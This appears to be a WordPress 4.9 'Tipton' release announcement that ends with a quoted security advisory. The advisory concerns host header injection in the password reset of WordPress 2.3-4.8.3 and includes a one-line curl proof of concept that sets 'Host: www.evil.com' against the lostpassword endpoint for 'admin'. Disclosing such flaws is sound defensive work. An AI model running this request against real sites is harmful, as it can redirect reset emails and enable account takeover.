Version 4.9 of WordPress, named “Tipton” in honor of jazz musician and band leader Billy Tipton, is available for download or update in your WordPress dashboard. New features in 4.9 will smooth your design workflow and keep you safe from coding errors.

Featuring design drafts, scheduling, and locking, along with preview links, the Customizer workflow improves collaboration for content creators. What’s more, code syntax highlighting and error checking will make for a clean and smooth site building experience. Finally, if all that wasn’t pretty great, we’ve got an awesome new Gallery widget and improvements to theme browsing and switching.

Security Fix

WordPress 2.3-4.8.3 - Host Header Injection in Password Reset

Description
Attacker may be able to set the 'From' email header in password reset emails.
Proof of Concept
curl -H "Host: www.evil.com" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://example.com/wp-login.php?action=lostpassword


https://wpvulndb.com/vulnerabilities/8807



Thursday, November 16, 2017







« Back